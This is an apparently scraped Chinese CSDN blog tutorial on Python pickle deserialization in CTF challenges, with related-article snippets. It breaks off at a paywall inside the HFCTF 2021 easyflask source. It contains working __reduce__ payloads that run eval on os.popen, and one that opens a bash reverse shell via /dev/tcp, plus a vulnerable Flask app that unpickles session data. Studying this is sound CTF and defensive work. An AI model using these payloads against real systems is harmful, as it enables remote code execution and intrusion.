CTF题型 Python中pickle反序列化进阶利用&例题&opache绕过(1)

最新推荐文章于 2024-07-18 20:42:32 发布
最新推荐文章于 2024-07-18 20:42:32 发布
阅读量975 收藏 26
点赞数 28
分类专栏: 程序员 文章标签: python android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84009579/article/details/137983967
版权
本文介绍了Python pickle反序列化的基础知识和危害,通过HFCTF、0xgame、HZNUCTF等CTF比赛的例题,展示了如何利用pickle进行RCE攻击。此外,还讨论了基于opcode绕过字节码过滤的技巧,包括如何编写payload,并推荐了pker工具来辅助生成payload。
摘要由CSDN通过智能技术生成 
	- 3.[[HZNUCTF 2023 preliminary\]pickle]( )
  • 二.基于opcode绕过字节码过滤

一.基础的pickle反序列化

pickle反序列化危害极大,不像php反序列化依赖恶意类和方法,而是直接可以RCE

关键代码

pickle.dumps(obj[, protocol])

功能:将obj对象序列化为string形式,而不是存入文件中。
参数:
obj:想要序列化的obj对象。
protocal:如果该项省略,则默认为0。如果为负值或HIGHEST_PROTOCOL,则使用最高的协议版本。

pickle.loads(string)

功能:从string中读出序列化前的obj对象。
参数:
string:文件名称。

漏洞有关的魔术方法
__reduce__

构造方法,在反序列化的时候自动执行,类似于php中的_wake_up

__setstate__

在反序列化时自动执行。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。

常用payload(没有os模块)

import pickle
import base64
 
class A(object):
    def \_\_reduce\_\_(self):
        return (eval, ("\_\_import\_\_('os').popen('tac /flag').read()",))
    
a = A()
a = pickle.dumps(a)
print(base64.b64encode(a))

环境有os模块

import pickle
import os
import base64

class aaa():
    def \_\_reduce\_\_(self):
        return(os.system,('bash -c "bash -i >& /dev/tcp/ip/port 0>&1"',))

a= aaa()

payload=pickle.dumps(a)

payload=base64.b64encode(payload)
print(payload)

#注意payloads生成的shell脚本需要在目标机器操作系统上执行,否则会报错

所以最好所有poc在linux上生成

例题

1.[HFCTF 2021 Final]easyflask

https://buuoj.cn/challenges#[HFCTF%202021%20Final]easyflask

非预期(任意文件读取)

image-20240325085226157

直接读环境变量/proc/1/environ

image-20240325085331374

预期解

app源码


#!/usr/bin/python3.6
import os
import pickle

from base64 import b64decode
from flask import Flask, request, render_template, session

app = Flask(__name__)
app.config["SECRET\_KEY"] = "\*\*\*\*\*\*\*"

User = type('User', (object,), {
    'uname': 'test',
    'is\_admin': 0,
    '\_\_repr\_\_': lambda o: o.uname,
})


@app.route('/', methods=('GET',))
def index\_handler():
    if not session.get('u'):
        u = pickle.dumps(User())
        session['u'] = u
    return "/file?file=index.js"


@app.route('/file', methods=('GET',))
def file\_handler():
    path = request.args.get('file')
    path = os.path.join('static', path)
    if not os.path.exists(path) or os.path.isdir(path) \
            or '.py' in path or '.sh' in path or '..' in path or "flag" in path:
        return 'disallowed'

    with open(path, 'r') as fp:
        content = fp.read()
    return content


@app.route('/admin', methods=('GET',))
def admin\_handler():
    try:
        u = session.get('u')
        if isinstance(u, dict):
            u = b64decode(u.get('b'))
        u = pickle.loads(u)
    except Exception:
        r
最低0.47元/天 解锁文章
2401_84009579
关注
专栏目录
[watevrCTF-2019]Pickle Store【Pickle反序列化
D.MIND 的博客
04-29 2102
文章目录Pickle反序列化简单字符类型的反序列化类的反序列化`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell 一进来看看Cookie处,果然又是一个session gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
CTFPython考点 SSTI&反序列化&字符串
qi_SJQ_的博客
03-01 4023
ctf题型分类: 1.CTFPython—支付逻辑&JWT&反序列化: 题目:2019 CISCN 华北赛区Day1 Web2(全国大学生信息安全竞赛) 先写个爆破请求脚本,爬取请求到内容页面哪个存在lv6图片,得到在181页: 或者这个脚本,都可以: import requests url = "http://web44.buuoj.cn/" for i in range(1, 2000): r = requests.get(url + "shop?page=" + st
HZNUCTF2023web相关题目
最新发布
2302_78903258的博客
07-18 953
得到源码后就是反序列化构造pop链了,不难看出是通过A类来触发B类的__call从而实现任意命令,执行后的回显肯定是在class B的__call 魔术方法里,所以我们需要让func和arg成为我们需要的变量。解码之后发现字符串有一个布尔值,空白原因可能是布尔值为0,一般来说0表示false,我们将0修改为1再进行base64编码,再将编码后的值替代之前cookie值发包。接着给出提示/bin/bash,接着我们构造payload,看看此文件,发现出现2个文件 ,查询文件无果。filename=a。
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 919
详细讲解pickle
python pickle反序列化漏洞_渗透测试 - 黑客技术 | 【技术分享】记CTF比赛发现的Python反序列化漏洞_吾爱漏洞...
weixin_39618121的博客
12-12 672
写在前面的话在前几天,我有幸参加了ToorConCTF(https://twitter.com/toorconctf),而在参加此次盛会的过程我第一次在Python发现了序列化漏洞。在我们的比赛过程,有两个挑战涉及到了能够接受序列化对象的Python库,而我们通过研究发现,这些Python存在的安全漏洞将有可能导致远程代码执行(RCE)。由于我发现网上关于这方面的参考资料非常散乱,查找...
CTF题型 Pythonpickle反序列化进阶利用&amp例题&ampopache绕过
m0_60607895的博客
05-05 1059
我们在看视频学习的时候,不能光动眼动脑不动手,比较科学的学习方法是在理解之后运用它们,这时候练手项目就很适合了,只是里面的项目比较多,水平也是参差不齐,大家可以挑自己能做的项目去练练。这是我花了几天的时间去把Python所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。它可以在对象从其序列化状态恢复时,对对象进行自定义的状态还原。构造方法,在反序列化的时候自动执行,类似于php的_常用payload(没有os模块)
Python pickle 反序列化详解
m0_65129142的博客
12-16 3034
什么是Python反序列化 python反序列化和php反序列化类似(还没接触过java。。),相当于把程序运行时产生的变量,字典,对象实例等变换成字符串形式存储起来,以便后续调用,恢复保存前的状态 python反序列化的库主要有两个,pickle和cPickle,这俩除了运行效率上有区别外,其他没啥区别 pickle的常用方法有 import pickle a_list = [‘a’,‘b’,‘c’] pickle构造出的字符串,有很多个版本。在dumps或loads时,可以用Protocol参数指定协
【网络安全 | CTF】记一次PHP序列化反序列化解题详析
等风来
08-24 3906
代码开门见山给出backdoor函数,而该函数在popko类的call方法调用故需要运行call方法而call方法是在对象上下文调用不可访问的方法时触发的故需要调用不可访问的方法 而恰巧destruct方法并不存在a对象和a函数故需要运行destruct方法而destruct方法在对象被销毁时触发 如何实现对象被销毁呢? 当序列化后的语句被反序列化之后,对象会被销毁,从而触发destruct方法 所以思路就是: 在pipimi类构造一个对象,当pipimi的destru
Python-CTFWiki是一个免费开放且持续更新的知识整合站点
08-12
CTF Wiki是一个免费开放且持续更新的知识整合站点,你可以在这里学到关于CTF竞赛及网络安全相关的有趣知识,我们为你准备了CTF竞赛的基础知识、常见题型、解题思路以及常用工具等,帮助你更快速地了解CTF竞赛以及网络安全。
CTF-rootme 题解之Python - pickle
weixin_30652879的博客
03-28 796
LINK:https://www.root-me.org/en/Challenges/App-Script/Python-pickle Referrence:https://github.com/Djazouli/RootMeHelp/blob/06d4ad358f43217c12dc8a36dc41ef9cea787f69/AppScript/Python_pickle.md  ...
自制人工智能TensorFlow之04 pickle序列化与反序列化
iCloudEnd的博客
03-09 841
自制人工智能TensorFlow之04 pickle序列化与反序列化 在机器学习,我们常常需要把训练好的模型存储起来,这样在进行决策时直接将模型读出,而不需要重新训练模型,这样就大大节约了时间。Python提供的pickle模块就很好地解决了这个问题,它可以序列化对象并保存到磁盘,并在需要的时候读取出来,任何对象都可以执行序列化操作。 demo #co...
100天精通Python丨黑科技篇 —— 21、大语言模型_100天精通python快速入门到黑科技
m0_60452141的博客
04-26 581
ChatGPT 是 OpenAI 推出的一种基于 GPT-3/4 的聊天机器人。chatgpt 的颠覆性影响主要体现在提高语言交流的便捷性、个性化服务、自动化客服和教育娱乐等方面,这些应用可以为用户带来更多的便利和乐趣,同时也为企业提供了更多的服务和商机。本文收录于,是由的硬核博主倾力打造,分基础知识篇和黑科技应用两大部分,欢迎订阅本专栏,订阅后可私聊进Python全栈VIP交流群(问题解答、互相帮助)还可领取20GPython视频和100本互联网行业电子书。
Python反序列化
qq_61209261的博客
07-31 1551
python反序列化
CTF靶机 Pickle Rick 笔记
z4yn:)的博客
06-23 926
Pickle Rick 靶机介绍 : 瑞克和莫蒂CTF。帮忙把瑞克变回人类! 靶机标签 : dirbuster, Linux, 命令执行 Nmap扫端口, 开放两个端口 22, 80 访问80端口 用dirbuster扫了目录发现一个登录页面, 没有账号密码 找了半天没找到账号密码, 根据提示查看页面源码看到了账号 - -! 密码是之前访问的robots.txt文件 - -! 登录页面发现是一个命令执行窗口 ls 查看第一个原料 查看flag时发现 cat 被...
攻防世界序列化漏洞详解与利用
在网络安全领域,尤其是CTF(Capture The Flag)挑战,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台涉及的序列化问题,通过一道具体的题目来深入解析这一主题。 序列化是将对象的状态...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值